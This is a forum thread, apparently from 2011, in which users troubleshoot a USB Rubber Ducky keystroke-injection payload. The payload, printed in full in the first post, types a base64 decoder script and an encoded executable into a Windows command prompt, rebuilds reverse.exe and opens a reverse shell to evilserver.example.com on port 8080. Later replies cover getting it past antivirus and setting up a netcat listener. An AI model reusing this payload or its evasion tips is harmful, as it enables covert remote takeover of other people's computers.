Jose B Posted October 9, 2011 Share Posted October 9, 2011 Any one else having trouble with the Reverse Shell Payload When It runs the 2 copy cons work, but when it gets to the csript I get the error c:\decoder.vbs(2 ,32) Microsoft VBScript compilation error: Expected end of statement Here's a Screenshot of cmd.exe when the error occurs: http://cl.joseb.me/AnTM Script used in the payload: (The only difference from the one in the wiki is the DELAYS I added to take the screenshot) ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER DELAY 1500 STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER DELAY 1500 STRING c:\reverse.exe evilserver.example.com 8080 DELAY 2000 ENTER DELAY 2000 STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
ascorbic Posted October 9, 2011 Share Posted October 9, 2011 (edited) Take a look at the screen shot you posted. Right before the first CONTROL Z you can see the VBScript for decover.vbs did not finish being copied. Here is the last line STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub The output was only STRING binaryStr This could have happened because something took focus away from the command prompt. Or, what I have been seeing in my testing is sometimes the ducky pushes strings out too quickly and the machine receiving them can't keep up. I added a STRING_DELAY which will slow down the output of strings to iducke.com, give this script a try. http://www.iducke.com/Encoder/IDE/b Edited October 9, 2011 by ascorbic Quote Link to comment Share on other sites More sharing options...
Jose B Posted October 10, 2011 Author Share Posted October 10, 2011 Yep, It works great now! Thanks :D Quote Link to comment Share on other sites More sharing options...
cgsilvers Posted October 18, 2011 Share Posted October 18, 2011 McAfee Antivirus picks this up as: Artemis!347446FE82BF (Trojan) Any way around this? Thanks, Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted October 18, 2011 Share Posted October 18, 2011 Disable your AV? Or maybe implementing a cloaked EXE to hide it? Quote Link to comment Share on other sites More sharing options...
Sl1m Posted October 27, 2011 Share Posted October 27, 2011 Hi guys ! I'm such a Newb :P but can anyone explain to me how to establish a session with the target computer once the the payload has been injected! I have no idea how this works! Do you have to specify the ip address of your remote computer ( the one you are using to access the target computer) and also what what do you have to change on the script before converting it to a bin file ! Excuse my newness Thanks Quote Link to comment Share on other sites More sharing options...
devenv Posted October 27, 2011 Share Posted October 27, 2011 Hi guys ! I'm such a Newb :P but can anyone explain to me how to establish a session with the target computer once the the payload has been injected! I have no idea how this works! Do you have to specify the ip address of your remote computer ( the one you are using to access the target computer) and also what what do you have to change on the script before converting it to a bin file ! Excuse my newness Thanks It's stated in the code: STRING c:\reverse.exe evilserver.example.com 8080 @wiki you can find how you can setup the receiving end. Quote Link to comment Share on other sites More sharing options...
Sl1m Posted October 27, 2011 Share Posted October 27, 2011 It's stated in the code: STRING c:\reverse.exe evilserver.example.com 8080 @wiki you can find how you can setup the receiving end. thanks for the reply ! I am very unfamiliar with servers. how do i set up one ? sorry again thanks Quote Link to comment Share on other sites More sharing options...
Sleven Posted October 27, 2011 Share Posted October 27, 2011 thanks for the reply ! I am very unfamiliar with servers. how do i set up one ? sorry again thanks You don't have to set up a server you could use your personal wifi router with netcat. You would use your public ip address and a port number above 1024. You will need to forward this port in your router and then listen for that port with netcat. I would suggest using this method for legal purposes. Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted October 28, 2011 Share Posted October 28, 2011 Anyone get a working metasploit payload past an AV? I know you can use shellcode to do that but doesn't the victim need to have software installed to run that shellcode? Has anyone tried implementing a Java click jacking style attack to avoid AV detection? Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted October 28, 2011 Share Posted October 28, 2011 Depends on the AV. I use Avast and while in a testing environment, I have to disable it to get any payloads past it. Perhaps that's a good thing? ;) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.